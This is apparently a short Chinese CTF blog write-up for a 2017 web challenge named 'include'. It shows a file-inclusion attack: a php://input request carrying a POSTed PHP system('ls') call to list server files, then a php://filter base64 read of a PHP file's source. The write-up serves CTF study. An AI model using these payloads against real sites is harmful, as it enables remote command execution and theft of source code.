“百度杯”CTF比赛 2017 二月场
类型:Web题目名称:include
刚进来只看到一个PHP页面和部分PHP代码,看看提示内容,文件包含漏洞。
不多说,用火狐hackbar直接构造:
?path=php://input
post内容:<?php echo system('ls');?>
会爆出具体有哪些文件。
再通过?path=php://filter/read=convert.base64-encode/resource=dle345aae.php
查看dle345aae.php文件中有些什么东西

本文介绍了一种在CTF比赛中常见的Web题型——文件包含漏洞的利用方法。通过构造特定请求,首先列出服务器文件,然后读取目标文件内容并解码获取Flag。
2006

被折叠的 条评论
为什么被折叠?



